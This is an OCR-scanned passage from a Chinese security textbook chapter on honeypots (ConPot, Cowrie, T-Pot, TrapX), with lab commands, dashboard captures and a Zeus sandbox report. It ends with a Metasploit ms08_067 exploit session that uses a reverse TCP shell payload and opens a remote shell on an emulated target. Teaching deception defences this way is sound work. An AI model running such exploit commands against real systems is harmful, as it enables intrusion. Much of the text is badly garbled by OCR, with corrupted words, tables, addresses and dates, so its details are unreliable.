DISMAN-EVENT-MIB::sysUpTimelnstance = Timeticks: (415) 0:00:04.15 
SNMPv2-MIB::sysContact.0 = STRING: Siemens AG 
SNMPv2-MIB::sysName.0 = STRING: CP 443-1 EX40 
SNMPv2-MIB::sysLocation.0 = STRING: Venus 
SNMPv2-MIB::sysServices.0 = INTEGER: 72 
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (0) 0:00:00.00 
SNMPv2-MIB::snmpInPkts.0 = Counter32: 9 
SNMPv2-MIB::snmpOutPkts.0 = Counter32: 0 
SNMPv2-MIB::snmplnBadVersions.0 = Counter32: 0 
SNMPv2-MIB::snmplnBadCommunityNames.0 = Counter32: 0 
SNMPv2-MIB::snmpInBadCommunityUses.0 = Counter32: 0 
SNMPv2-MIB::snmplnASNParseErrs.0 = Counter32: 0 


.- truncated for brevity>... 


TFAAR, SUE Web2rm. üud21-1BTz«. 254 A XR HRefresh AA Sr. 


€ Q (Y |© 192.168.80.231/index.html 


Technodrome 


Status: 


Current time: 00:34:16 
System uptime: 354 timeticks (deciseconds) 


图 21-1 奏 看 Web 界 面 


注意 :可 在 源 文 件 的 templates 目 录 中 调整 系统 名 和 其 他 指纹 (Fingerprint) 项 。 
强烈 建议 对 其 进行 修改 ， 否 则 ， 用 户 将 无 法 获得 一 个 十 分 活跃 的 ConPot。 


可 在 共 至 文件 夹 中 找到 日 志 : 


root@kali:~# less var/log/conpot/conpot.log 
21.2.3 ”实验 21-3: Cowrie 


A Scu IEE H Cowrie EG, 3 FE —7 SH REE H 38 ME, 能 模拟 SSH 和 Telnet。 
最 重要 的 是 ，Cowrie 密 铅 可 以 捕获 每 条 命令 ， 还 能 重 放 击 键 次 序 ， 方 便 组 织 的 安全 
团队 了 解 黑客 活动 。 

克隆 honeypot GitHub 存 储 库 ， 然 后 配置 、 构 建 和 运行 蜜 铅 : 


root@kali:~# git clone 
https://github.com/micheloosterhof/docker-cowrie.git 


root@kali:~# cd docker-cowrie 


463 


第 V 部 分 高 级 恶意 软件 分 析 


root@kali:~/docker-cowrie# mkdir -p var/log/cowrie var/run etc 

root@kali:~/docker-cowrie# cat <<EOF>> etc/cowrie.cfg 

[telnet] 

enabled = yes 

EOF 

昌 于 这 个 特定 的 Docker 镜 像 将 用 户 名 设置 为 cowrie， 在 本 节 的 实验 中 ， 不 想 设 
置 一 个 全 局 可 写 ( 用 户 可 在 日 总 中 写 入 ) 的 共 孚 文件 光 ， 此 次 将 使 用 Docker 的 郑 功 能 。 
按 如 下 方式 设置 Docker 郑 ; 


root@kali:~/docker-cowrie# docker volume create cowrie 
现在 ， 硝 认 创 建 卷 ， 并 检查 其 位 置 ( 后 面 会 用 到 ): 


root@kali:~/docker-cowrie# docker volume inspect cowrie 


[ 


"Driver": “local 

"Labels": i}, 

"Mountpoint": "/var/lib/docker/volumes/cowrie/ data", 
"Name": "cowrie", 

"Options"- 1}, 


"Scope": "local" 


] 
构建 Docker 镑 像 并 运行 它 : 


root@kali:~/docker-cowrie# ./build.sh 

root@kali:~/docker-cowrie# docker run -it -p 2222:2222 -p 

2223:2223 -v etc:/cowrie/cowrie-git/etc -v 

cowrie:/cowrie/cowrie-git/log cowrie 

b4del484e3c86c2c9b06499207657854d37025305b1c8380cf10585911747c94f 

fEXX Hn] GB, ./run.sh fe AS ££ vig 1 2222(SSH) #12223 (Telnet) 351] KiE. AY 26 
择 在 普通 山口 2 和 23 上 运行 脚本 ， 但 那样 的 话 ， 需 要 移动 实际 运行 中 的 任何 服务 。 
例如 ， 要 将 SSH 改 成 另 一 个 痕 口 ， 可 编辑 /etc/ssh/sshd config， 蝎 改 闹 口 设置 ， 并 执 
行 以 下 命令 来 重 司 服务 : 


# service ssh restart 


在 另 一 个 Linux 或 Mac shell F, 5E E WEAZH. nDUAHHARHAP ap Soe, HEHE 
何 密码 (除了 root 或 123456): 


$ ssh -p 2222 root8192.168.80.231 
The authenticity of host '[192.168.80.231] :2222 
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([192.168.80.231]:2222)'' can't be established. 

RSA key fingerprint is 
SHA256:/rjlInNCaGf5SFRbyMxppFO0gVniQGX7nN6rTpóxlhNm4. 

Are you sure you want to continue connecting (yes/no)? yes 
Warning: Permanently added '[192.168.80.231]:2222' (RSA) to the 
list of known hosts. 


Password: 


The programs included with the Debian GNU/Linux system are free 
Software; 
the exact distribution terms for each program are described in 


the individual files in /usr/share/doc/*/copyright. 


Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
permitted by applicable law. 


root@svr04:~# ls 

root@svr04:~# pwd 

/root 

root@svr04:~# id 

uid=0 (root) gid=0(root) groups=0 (root) 
root@svr04:~# wget www.google.com 

--2017-08-19 00:53:19-- http://www.google.com 
Connecting to www.google.com:80... connected. 
HTTP request sent, awaiting response... 200 OK 
Length: unspecified [text/html; charset=ISO-8859-1] 
Saving to: "/root/index.html' 


100% [======================================>] 0 9K/s 


2017-08-19 00:53:20 (9 KB/s) - "/root/index.html' saved [10457/0] 


root@svr04:~# cat index.html 

cat: /root/index.html: No such file or directory 
root8svr04:-4 ls -1 

—rw-r-—r-- 1 root root 0 2017-08-19 00:53 index.html 


root@svr04:~F# 


注意 ， 系 统 看 上 去 只 是 下 载 文件 (这 里 的 文件 不 是 真正 的 文件 ， 大 小 是 0)。 在 
Docker 实 例 上 按 下 CtrlHC， 人 停止 容 髓 。 

Cowriie 的 一 个 重要 能 力 ， 就 是 可 以 将 恶意 黑客 的 攻击 过 程 按 照相 同 的 时 间 顺 序 
重 放 。 在 上 面 的 卷 位 置 ， 获 取 Cowrie playlog 脚 本 ， 针 对 tty 日 志 运 行 它 : 


root@kali:~/docker-cowrie# wget 
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https://github.com/micheloosterhof/cowrie/raw/master/bin/playlog 
==2017-08-18 23510274 -— 

.<truncated for brevity>... 
(raw.githubusercontent.com)|151.101.56.133|:443... connected. 
HTTP request sent, awaiting response... 200 OK 

Length: 3853 (3.8K) [text/plain] 

Saving to: 'playlog' 


playlog 


2017-08-18 23:10:24 (37.8 MB/s) - 'playlog' saved [3853/3853] 


root@kali:~/docker-cowrie# chmod 755 playlog 
root@kali:~/docker-cowrie# ./playlog 
/var/lib/docker/volumes/cowrie/ data/tty/* 


The programs included with the Debian GNU/Linux system are free 
Software; 
the exact distribution terms for each program are described in the 


individual files in /usr/share/doc/*/copyright. 


Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
permitted by applicable law. 


root@svr04:~# ls 

root@svr04:~# id 

uid=0 (root) gid=0(root) groups=0 (root) 
root@svr04:~# pwd 

{root 

root@svr04:~# exit 


root@kali:~/docker-cowrie# 


这 十 分 有 趣 ， 可 以 实时 看 到 自动 播放 输入 或 运行 的 内 容 。playlog 脚 本 还 包含 允 


许 加 快 或 减 慢 回放 速度 的 选项 。 


21.2.4 ”实验 21-4: T-Pot 


在 这 个 综合 性 实验 中 , 首先 下 载 并 安装 工 Pot 密 饶 , 这 会 自动 安装 其 他 几 种 蜜 饶 ， 


包括 前 面 实验 中 使 用 的 黎 乒 。 另 外 ， 工 Pot 包 括 一 个 构建 于 Elasticsearch、Losgstash 和 
Kibana(ELK) 栈 之 上 的 用 户 界 面 。 本 实验 中 测试 的 T-Pot 版 本 可 从 本 书 网 站 下 载 。 也 
可 从 T-Pot GitHub 下 载 好 新 版 本 (可 参阅 “扩展 阅读 ”)。 
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标准 工 Pot 密 能 的 系统 最 低 要 求 如 下 : 4GB RAM，64GB 便 内 空间 (这 十 标准 的 密 
钠 要 求 ， 如 果 配 置 比 这 低 一 些 ， 或 许 也 能 运行 )。 运 行 T-Pot 蜜 钠 的 最 简便 选项 是 下 
载 ISO 镜 像 (或 构建 目 己 的 镜像 )， 然 后 将 其 在 VMware 或 VirtualBox 中 挂 载 为 虚拟 CD， 
并 局 动 虚拟 机 。ISO 是 64 位 Ubuntu 版 本 ， 如 图 21-2 所 示 。 另 外 ， 计 算 机 要 务必 达到 要 
求 的 最 低 配 置 。 因 为 进行 的 是 有 限 测试 ， 可 以 使 用 较 小 的 硬盘 (SGB)。 


ubuntu? 


Installer boot menu 


 T-Pat 17.18 
fiduanced options 
Help 


图 21-2 ISO 是 64 位 Ubuntu 版 本 


按 下 Enter 键 ， 选 择 默认 安装 程序 (TPot 17.10)。 系 统 将 提示 选择 语言 和 键盘 。 此 
后 开始 安装 ， 安 装 过 程 需要 20~30 分 钟 时 间 ， 时 长 与 系统 的 资源 有 关 。 期 间 ， 会 提 
出 一 些 配 置 问题 ， 如 蜜 钢 类 型 (本 实验 选择 Standard)、tsec 用 户 账 户 的 密码 以 及 Web 
界面 的 第 二 个 用 户 名 和 密码 (不 要 万 挥 )。 完 成 后 ， 将 提示 登录 。 使 用 tsec 账 户 以 及 提 
供 的 第 一 个 密码 登录 。 在 登录 屏 舌 中 将 看 到 蜜 色 的 IP 地 址 和 Web URL， 如 图 21-3 所 
示 。 在 Web 界 面 上 使 用 建立 的 第 二 个 用 户 账户 以 及 密码 。 


lonelyfleck login: 


421-3 WW ASA RERIP HEL AlWeb URL 
在 另 一 个 Linux 或 Mac 系 统 上 ， 使 用 Nmap 扫 描 IP。 接 下 来 打开 Web 界 面 ， 使 用 前 
面 的 P 地 址 (https:WIP:64297)， 选 择 T-Pot 仪 表 板 。 需 要 将 蜜 钢 放 在 公 网 连接 上 ， 可 以 
在 仪表 板 中 查看 一 些 活动 。 图 21-4 显 示 了 这 个 工具 的 潜能 。 
” 注意 : 图 21-4 和 图 21-5 已 经 T-Pot 最 新 版 本 的 开发 人 员 授 权 使 用 ; 在 本 书 出 
版 后 ， 格 式 和 功能 可 能 已 经 发 生 了 变化 。 
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B bad reputation a France 
@ har, crawler e Poland 
form spammer È Hetherland: 
È mass scanner $ United States 
ir ior exi node a. China 
B anonymizer È Brazil 
Spain 
e Cehia 
È Mexicz 


POF C$ Distribution fr Honeypot Events Pie 
e e DE ICE 


B Linux 3.11 and newer l | E Corie 


图 21-4 在 仪表 板 中 查看 一 些 活动 
辣 下 深 动 ， 可 看 到 更 多 细 方 ， 如 图 21-5 所 示 。 


lt Linux 3.11 ard near $ Corin Jp Te MN RS God aELT ee Ae IT oh 17-08-71 a 
iW Urur i d Dinasa Timestamp 
di Linus 2.2 x-€x LL] 
li Linux 31-515 @ Honeyirap Honeypot Destination Ports Histogram 4" 
i inse 7 ar E LE — 
H 
® Linux 2:2 x-X- x hara... B Wiciowpect 
B Winzicwa HT korrel W CorPot 2 DODC. 
B Lirur 24 Wi FlassrPo: 
I Linux 2:2 x-3 x jna T.. Wr oMabilic; 
B - 
7E] DoD) A EN TSO Te STR — 20807027 QOO 710831 0050 
un 
Cowie kemane Tagcloud «^. Cowie Pasoword Tagcloud 4 Honeypot by Country amd Pori a 
SE) O25 EA BRUM CEEE Be DLE Corni Prisa a ee Ss EE Bla 


e 
E Uu FTT Fn T] 


E root admin 1225 shell = 


enable sh 151 enable admin 
shel — -/var/ minm ae ed /var/ /bin/busybhox EGGHI 


Russis: geo p.c ouo nam Frenos: gece cp nc ry. nam Poland: perpeno ummy. nam re ris BO 本 cu ined Ermer geep ICar 
Honeypot ASN - Top 10 z" Honeypot Source IP- Top 10 z" Surikata CWE - Top 1D a 5uricata Alert Signature - Top 10 a 
AS - ASHE CHT È Source iP? CNT © CVE ID $ CNTs in Descriptian - CHT ê 
1338  YAMDEX LLC 3259525 3j,9,113,206 353255 -H 115403 ais ET WEB SERVER SOL Emors in HTTP 200 Response [ORA-] 1721691 
1276 — OnlineS.as 1180899 219,180 20355 957862 27333 2015668 ET WEB SERVER SQL Errors in HTTP 200 Response [mysql query} 392821 
157225 sprint SA. 473825 21.15.143.218 £42815 -VE- 1905-1538 14705 Jd165572 ET WEE. SERVER SOL Erors in HTTP 200 Response (errar in your SOL synta 352113 
235 NForce Entertainment B.V. 115234 5.95 20759 Anges 13246 20164303 ETINFO UPnP Dicovery Search Response vwulnerabie LIPnIP device 2 115203 
49453 — (Global Layer B.V. 51185 135,22. 125,166 32900 8190 2101251 GPL TELNET Bad Login 58520 
ae Telefonica De Espana 50447 37,0,113,79 2513456 6338 eae? SURICATA Applayer Detect proracal only ene direction 42212 
4134 3.31 Kn-rsng Street 20817 £ ca x) 253450 6035 2020528 ET ATTACK, RESPONSE Oracle error in HTTP resparse, possible SOL injection point 30718 
A124 Chimanet 1832 55.123 84,221 160582 6017 Ds ETATTACK_RESPOMSE MySCL error in HTTF response. possible SQL inpection poirt 30601 
27176  DatəaWagon LLT 35497 51 1574. 124178 CVE-1999- 101 1 5078 2101917 (GPL MISC UPnP service discover attempt 30118 
iird  CHIMAHET Guangdong province menwark 35141 163.172. 161.152 122726 CvE-1999-1376 5653 2020555  ETATTACK RESPONSE DB error in HTTP resparee possible SOL injection point 27575 
Exporn RES 二 Formate di taper: Aged Forrrutted d Expor Ras 二 armej Expo Aged Formstied d 


图 21-5 ”查看 更 多 细节 


这 个 Web 界 面包 含 多 个 工具 , 包括 Elasticsearch head( 这 是 搜索 的 起 点 ), 如 图 21-6 
所 示 。 
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| c C (y A Not Secure | htips://192.168.0.139:64297/|tpotweb.html 


Elasticsearch https-//192 168.0.130-64297/e5/ 

Overview Indices Browser Structured Query [+] Any Request [+] 
Browser 

All Indices - 
Incices index 

.kibana 

logstash-2017.08.20 

TW - 7. t= 

eene Eo logstash-2017.08.20 
Tym logstash-2017.08.20 
ane logstash-2017.08.20 
Dionaes logstash-2017.08.20 
NGINX ii logstash-2017.08.20 
= logstash-2017.08.20 
Suricat logstash-2017.08.20 
Sysiog logstash-2017.08.20 

default. logstash-2017.08.20 


Connect 


Dionaea 
Dionaea 
Dionaea 
Dionaea 
Dionaea 
Dionaea 
Dionaea 
Dionaea 
Dionaea 
Dionaea 


Home 


Searched 2 of 2 shards. 10 hits. 0.001 seconds 
-type 


m 
AVABA75W-YdigRz752nd 
AVABA75W-YdiqRzZS2ng 
AVABA7XU-'YdigRzz52el 
AVABA6bq-YdigRzZzS2Jv 
AVaBA6bqg- YdigRzz5213 
AV4BASbq-YdiqRzZ5216 
AVABASba- YdigRz252]7 
AVABA6bq-YdiqRz2521]8 
AVABA5bg- 'diaRzz28219 
AV4BA6bq- YdiqRzZ52]- 


1 
1 
1 
1 
1 
1 
1 
1 
1 
1 


Kbana 
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re X pot hostname 


agreeablespray 
agreeablespray 
agreeablespray 
agreeablespray 
agreeablespray 
agreeablespray 
agreeablespray 
agreeablespray 
agreeablespray 
agreeablespray 


图 21-6 Web 界面 包括 Elasticsearch head 


尺 一 个 工具 是 SpiderFoot 搜 索 页 ， 人 允许 碍 找 攻击 者 的 信息 ， 


ES Head 


tpotcluster Flüsterealth: green (2:61 2)- 


欺骗 : F-RA 


Spidertoot 


t- 
pot ip int type src port 


192.168.0.139 
192.168.0.139 
192.168.0.139 
192.168.0.139 
192.168.0.139 
192.168.0.139 
192.168.0.139 
192.168.0.139 
192.168.0.139 
192.168.0.139 


Dioónaea 
Dionaea 
Dionaea 
Dionaea 
Dionaea 
Dionaea 
Dionaea 
Dionaea 
Dionaea 
Dionaea 
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58244 
57918 
57260 
57274 
57283 
57282 
57277 
57314 
57428 


如 图 21-7 所 示 。 


[di] SpiderFoot | €Wewscan | mscans — Settings 
New Scan 
Scan Name 
Google 
Seed Target 
google.com 
By Use Case By Required Data By Module 
o All Get anything and everything about the target. 


All SpiderFoot modules will be enabled (slow) but every possible piece of information about the target will be obtained and analysed. 


图 21-7 SpiderFoot 搜 索 页 


男 外 ， 这 个 Web 界 面包 括 名 为 Portainer 办 Docker 容 如 界面 ， 人 允许 控制 Docker 容 侨 


(例如 图 21-8 中 的 Dionaea)。 


e Actions 


BE Container status 


ID 289B79d36d6l8BeAacbaBidibaecie62530beaaa715]f7alecblBdO39e0a40943 
Name dionaea L4 
Status *? Running since 24 minutes 
Created 2017-06-20 14:50:17 
Start time 2017-08-20 14:50:19 
biu Stats O Logs + Console 


[21-8 


也 可 通过 shelj 与 每 个 容 堪 交互， 


允许 控制 Docker 容 器 


如 图 21-9 所 示 。 


^ Duplicate/Edit 
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PNVD 高 级 恶意 软件 分 析 


://192.168.0.139:64297/tpotweb.html 


Container console 
Containers > dionaea > Console 


_ Console 


Exec into container as using command Disconnect 


roote289879d36d61:/# pwd 


/ 

rooté269879d36d61:/# id 

1iid-0(root) gid-O0(root) groups-0(root) 
root8289879436d61:/s J 


图 21-9 3Bishell*; 8E 4 48 26 H. 
另外 , Netdata 页 面 显 示 重 要 的 服务 器 信息 , 这 个 页 面 似乎 可 无 限制 地 加 下 滚动 ， 
如 图 21-10 所 示 。 


System Overview 


[RAPE cl Hu kë; mortem mers 


图 21-10 ”Netdata 页 面 显 示 重 要 的 服务 器 信息 


最 后 ， 如 有 必要 ， 可 通过 Wetty 全 权 访 问 Web 控 制 台 ， 如 图 21-11 所 示 。 对 于 非 本 
地 访问 ， 则 需要 上 传 SSH 密 钥 。 
一 C Ù //192.168.0.139:64297/tpotweb.html 


The authenticity of host '[127.8,0,1]:64295 ([127,0,0.1]:64295)' can't be established. 
ECDSA key fingerprint is SHA256:uh6PSTMypB4F«uJishnmJgQf IX206f3kRLyY8Jhn470. 

Are you sure you want to continue connecting (yes/no)? yes 

Warning: Permanently added '[127.0.8.1]:64295' (ECDSA) to the list of known hosts. 
tseciaal27/.0.0.1'5 password: 

Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-92-generic xB6 64) 


x Documentation: https://help.ubuntu.com 
* Management: https:// landscape. canonical. com 
本 Support: httos://ubuntu. com/advantage 


The programs included with the Ubuntu system are free software; 
the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 


Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by 
applicable law. 


To run a command as administrator (user "root"), use "sudo «command»"., 
See "man sudo root Tor details. 


图 21-11 ”可 通过 Wetty 全 权 访 问 Web 控 制 台 
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所 有 数据 部 存储 在 /data 文 件 灯 中 ， 可 从 主机 访问 这 个 文件 类 ， 如 图 21-12 所 示 。 


C! {t | A Not Secure | https://192.168.0.139:64297/wetty/ssh/tsec 


tsecal27.0.0.1's password: 
elcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-92-generic x86 64) 


* Documentation: https: //help.ubuntu. com 
x Management: nttps:// Landscape. canonical.com 
* Support: https://ubuntu. com/advantage 


Last login: Sun Aug 20 19:28:37 2017 from 127.0.0.1 
sudo bash 
[sudo] password for tsec: 
ls /data/dionaea/bistreams/2017-08-20/ 
ftpd=-21=-: :ffff:192.168.0.117-XacM/7c mysqld-3306-: :Tfff:192.168.0.117-BE4jqi 


图 21-12 ”可 从 主机 访问 /data 文 件 夹 


es HER 要 在 基于 云 的 Ubuntu 16.04 系 统 上 运行 蜜 锥 ， 只 需要 运行 以 下 命 
MS 令 即 可 。 本 实验 环境 中 还 需要 向 公众 开放 TCP 0 ~ 64000 端 口 ， 并 向 本 地 
IP 开 放 64001 及 更 高 端口 (如 果 想 在 开放 端口 方面 更 具 选 择 性 ， 请 参阅 本 
草 “ 扩 展 阅读 ”中 的 TPot 网 站 链接 )。 


git clone 
https://github.com/dtag-dev-sec/t-pot-autoinstall.git 
cd t-pot-autoinstall/ 

sudo su 

./install.sh 


21.3 ”可 选 的 商业 化 产品 : TrapX 


有 多 个 商业 解决 方案 可 供 选 择 ， 其 中 包括 : 


e lrapX 

e Attivo 

e Illusive Networks 

e Cymmetria 

每 个 商业 解决 方案 各 有 所 长 ， 都 值得 一 试 。 不 过 ， 本 和 草 只 重点 讲述 其 中 一 个 ， 
即 TrapXDeceptionGrid。 本 书 上 一 版 中 曾 重 点 摘 述 过 TrapX， 这 个 产品 给 谈 者 留 下 了 


深刻 印象 。 与 那 时 相 比 ， 今 天 的 TrapX 得 到 了 极 大 改善 。 

登录 到 TrapX 时 ， 将 看 到 一 个 仪表 板 ， 如 图 21-13 所 示 ， 其 中 显示 了 各 种 数据 ， 
包括 入 站 和 出 站 威胁 、 排 名 前 10 位 的 事件 、 威 胁 统 计数 据 ， 以 及 工作 站 、 服 务 嚣 和 
网 络 谤 饵 的 健康 状况 。 
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第 IV 部 分 


高 级 恶 昌 软件 分 析 


Dashboard Event Analysis Settings 


Outbound Threats Internal Threats Show: Last wee All Companies 
All companies - Events Timeline Company Events (474) 
— E Outbound Threats E intemal Threats ii Riskievel Typa — 
ABC Metis [ ] Dutton Inbernal 115 
150 Gatham Financial ë Outbound Internal 109 
Wayne Enterprises è Dutbound Internal 143 
m Tyrell Comp a Outbound, Internal n 


27. Aug ŽB. Aug 79. Aug 30. Aug 31. Aug 1. Sap 4. Sep 
1 | 2848.2007  ， 30108,2017 i 01.08.2017 L| 
i [LL] k 
Workstation Traps LJ Top 10 Events Threat Statistics 
A 7 © Soarce IP Attacks Destination IP Attacks 
10.00.1855 n: innniz ES ! 
á 2 o 10.225 32 6522855114 az 
LLAT 29 mona Em 
Trap events Network Intelligence Events 
Server Traps = 14.000 241 25 300015 n2 
LLL? 2& 100016 a; 区 到 Infection BotNet & CC 
au 5 o 10.00 248 34 456256180 3 
100.18 J BARS lé Interaction Malware & Trajan 
A 1 o 10.00.17 19 102030108 12 
1.00.16 18 102031100 11 "EM Reconnaissance Intelligence Gathering 
Metworking Traps i n Inns Ir 103030106 3 
e Connection 
a 2 © 
Industrial Traps TIE 
Geolocation 


Traps 


a 3 O 
Medical Dewices Traps 


w 1 0 


Lie f 
LE. 
m a 


* è 
图 21-13 ”仪表 板 


如 图 21-14 所 示 ， 使 用 Event Analysis 屏 幕 显示 事件 时 ， 
`% € Jr YLI) o 


可 过 渡 事 件 (例如 ， 可 过 


Event Analyzer ^ Attack Visualization Forensics Event Correlation Monitor | Event Workflow 
Type Event ID Event type Attacker hosiname Attacker |F Trap namie Protocol Part Start time 
Trap Infection All AM 
Your search criteria returned the follawing results: E } Delete all | 
ID Svr Type Attacker hostname  AttackherIP Trap name Protocol Port Proxy Start T Duration 
26218204 ÑE Infection 10.0.0.162 1000.157 GetharmFinacial3 MT SMB 445 2006 2017 14:45:57 13300 rir 
2621819) (is) Infection 1000162 1000162 GothamFinacial3 MT SMB 445 20006 2017 025549 02:53 min 
#6218174 (e Infection 10.0.0.162 104040152 Gethamrinacial3 MT SME 445 26062017 055544 02:59 mir 
25218163 i= Infection 10.0, 0.164 10.000.162 GethamFinacial3 MT SMB 445 37 06 2017 055 03:00 min 
2b2 LET 4 (i) Infection LOO 152 104060. 1572 GeothamFinacial3 MT SME 445 Jb 6 201 MEARS sx! min 
25218135 (m Infection 10.0.0.163 1000.157 GetharFinacial3 MT SME 445 251062017 045943 03:00 rir 
25218127 (s) Infection 1000.162 1000162 GothamFinacial3 MT SME 445 24.06 201 7 OS Soy 3:00 min 
2b21B11d (e Infection 104.0 1862 TO. Db GethamfFinacial3 MT SME 445 423406 201 / Oi S5r41 Uc: mun 
26718095 (i) Infection 10.0. 0.1682 10.000.162 GeothamFinacial3 MT SMB 345 22 06 2017 0864 7 03:00 rin 
25218083 i Infection 100.0162 1000162 GothamfFinacial3 MT SME 445 2106 2017 05541 02:553 min 
26218070 is Infection 10.0.0.162 10.04.1562 Gethamrinacial3 MT SME 445 20062017 0x 5541 02:59 min 
25218059 (e) Infection — 1040.16 104040162 GothamFinaciali MT SMB 445 19.06.2017 Q5 3540 03:00 min 
2b. LELEH (e Infection 1040173 10001/3 GothamfFinacial3 MT SME 345 14052017 0S5 35 2:59 min 
262180346 (e Infection 10.0.0.166 lO. 0 166 AhcMuotores5 MT SME 445 17052017 0755835 0a rin 
262184025 (im) infection 1000173 10400173 GothamFinacial3 MT SMB 445 16405 2017 025536 03.00 min 
26218017 (is Infection 10.0.0.166 10.440.186 AbcMüotoros5 MT SME 445 16052017 025539 03:00 rin 
2521 ROLMS = Infection 10.9.0.174 10.000.173 GolthamFinacisl3: MT SMB 345 15405 2017 0x55 3E 02:59 min 
2b Ley] (e) Infection LUO 165 10060. 166 AbcMotoros5_MT SME 245 1545 2U1 UESB a min 


图 21-14 ”使 用 Event Analysis 屏 幕 显示 事件 


件 ， 只 需要 双击 它 ， 即 可 在 杀伤 链 视图 中 查看 所 有 已 记录 的 行为 ， 如 
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图 21-15 所 示 。 


Attack Highlights 


Host name 

IP Address: 

Port: 

Logan 

Mari Igmestamp 


End Tumestarng 


PSEXESVC exe 


Attack Details 


Contains text 


1000.162 m SMB 445 Login 
n 0.162 Name GüthamFinaciali, MT 
3210 7 IP aides: 1000.16 Files 
cyberuser (SMBT) Emulation type: Windows Station 
2/5/20] 7 14541057 (Fi: Microsoft Windmas 7 Process 
29/06/2017 145457 
Sen 
Connection 


a7cdíac19157 7e5152/07 244550881728 


G7e2afsfüob41 Ze 7FXGcHHfed7 003 


LI 14:49:57 Logon: cybersuser (5MBT) 
$ 14:49:57 Connect hX1004016ADMINS 
* 14:45:57 Connect SD TENPCS 
* 14:43:57 Connect S100. 160$ 
& 14:49:57 Dir; CY 
(i 14:45:57 Remove directory: C^falderi 
(e 14:49:57 AT Execute ld 2, zàcom exe 
E 14:49:57 AT List: 
n 1449:37 Creale File: Cearna Pak RES VE ene 
(is) 14:45:57 Create Service: Senice Mame: PSEXESWC Binary Path: S5 5ystemRoot VP SEXESVI exe 
(i 1d:d3:57 Create File: C'owiridewes Mile. exe 
Static Analysis 
PSEXESVC exe file.exe 
Details Resources and sections 


a 
à 
4 
4 
1 
4 
* Fi 
17/17 Events 


图 21-15 在 杀伤 链 视图 中 查看 所 有 已 记录 的 行为 


注意 ， 恶 意 攻 击 者 局 动 了 PSEXEC 服 务 ， 创 建 了 文件 file.exe。 组 织 可 答 看 沙 箱 
报告 中 对 文件 的 动态 分 析 ， 包 括 行 为 、 网 络 活 动 、 进 程 、 工 件 、 注 册 表 项 活动 以 及 
文件 系统 活动 ， 如 图 21-16 所 示 。 


Forensics of có7eZaf5f89b417e7f£206cd1fe47a03f 


Payload was found at traps: AbcMotoros5 MT GothamFinacial3 MT 


Metadata 


Behavioral Indicators 


Network Activity 
Processes 
Artifacts 


Registry Activity 


Filesystem Activity 


Possible Zeus Variant Detected by Antivirus 


Zeus is a toolkit that provides an easy way to build and administer a 
botnet. The Zeus trojan is a primarily focused on stealing online banking 
information. Zeus provides the individual ar group behind the infection 
multiple ways to steal information; these include keylogging, screen 
capture, credential theft, and Man-in-the-Browser attacks. This web inject 
process allows Zeus to modify the html of a website to inject additional 
form fields inte the page in order to steal banking credentials and other 
sensitive information. ZeuS does not have any ability to spread itself and 
sn is often spread through spamming botnets like Cutwail and other 
means such as compromised websites hosting exploit kits such as 
Blackhole, Phoenix and others. 


Excessive Suspicious Activity Detected 


The submitted sample has been observed performing a number of 
suspicious actions. None of the indnadual actions by themselves are 
particulary malicious, but when all behaviors are observed together they 
can be considered malicious. Far information about the suspicious 
activities, refer to the other indicators triggered by this sample. 


Process Modified an Executable File 


Kl21-16 ”小 箱 报 告 中 对 文件 的 动态 分 析 


| 


Behavioral Indicators 


Severity: 100 Confidence: 100 


trojan, zeus, fraud, banker 


Severity; 90 Confidence: 100 


compound 


suspicious, threshold 


Severity: 60 Confidence: 100 
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B IV 部 分 


局 级 伙 意 软件 分 析 


Fb 
HIZR o 


如 图 21-17 所 示 ， 组 织 需 


File size 1859792 
File type PEA? executable (console) Intel B0385, for MS Windows 
File MD5 Bidfac3of57 7e5r52807 2445568832208 
File SHAI Dc5aBaDc1 1b95cad22bB84d48-5[0/37 9e054 f 
File ssdeep om Ami psih ew EMA Fi TFrGIBERDEDIElcADnEu ttr x90: S RM pS BEI TETOBCHDBu:sC 
File date D353388341 [sun Mar 30 2050-41 2014 UTC] 
File EP Gesac emt Df 
Outbound Connection PA 
File CRC Claimed: O17 9l, Actual: (378b 
File packers M/A 
TLS callbacks PLA. 
Sar Gervicel inis patcher 
CreateProcessáslsarVif 
Suspicious alerts OpenProcess Token 
Startervice 
CroatoSornacev 
Version infa LegalCopyrght: Copyright wad 2001-2014 Mark Russinovich ImtermalMarnie: Pe wer Sersice Host FileVersian 2,11 CompanyName: Sysinternals ProductMame: Sysinternals P... 
AV Raoferences MA F NA. 


真正 有 趣 的 地 方 在 于 ， 当 使 用 TrapX 筷 拟 SMB 命 令 


图 21-17 EAX SE BA SH 


， 并 人 允许 恶意 
令 的 影响 ， 如 图 ?1- 18 所 示 。 


这 些 命 令 


TrapX 对 监测 和 控制 这 


if > use exploit/windaws/smb/msBüB Bb/ netapi 


asf exploiti 
RHOST => 192 
msf exploit( 
payload => 
msf exploit 
LHOST => 192 
msf exploit 


[*] Started 


*] 192.168. 


*] Encoded 
[*] Sending 
*] Command 


:dir 
Volume in 


windows/shell/re 


| ) > set RHOST 192.168.108.133 
2.168.108. 133 


i ayload windows/shell/reverse tcp 


et p 
err 
set L 


| HOST 192.158.188.12 
2.168.188.17 


| ) > set target 4 


) > 


reverse TCP handler on 192.158:188.12:4444 

188.133:445 - Attempting to trigger the vulnerability... 

stage with xBb/shikata ga nai 

encoded stage (267 bytes) to 182.168.188.133 

shell session 1 opened (192.188.188.12:4444 -> 192.168.188.133:54887) at 2817-88-28 23:41:37 -8588 


exploit 


drive C has no label. 


Volume Serial Number is BC23-2A69 


Directory 


09/24/2815 
09/24/2815 
99/24/2815 
B8/18/ 7817 
89/74/2815 
09/24/2815 
89/24/2815 
63/25/2085 
83/25/2885 
09/24/2015 
80/24/2815 
90/24/2815 
88/18/2817 
99/24/2815 
[09/24/2815 


coll 


of C: 


AUTOEXEC . BAT 
boot.ini 
B CONFIG.5YS 
data 
Documents and Settings 
10.575 
MSDOS . SYS 
NHTDETECT . COM 
ntldr 
pagefile.sys 
Program Files 
5ystem Volume Information 
testfordemo 
WINDOWS 


£24 


"T 
= 


47/72 
295,936 
1,616,612, 730 
<DIR> 
<DIR> 
<DIR> 
<DIR> 
<DIR> wmpub 
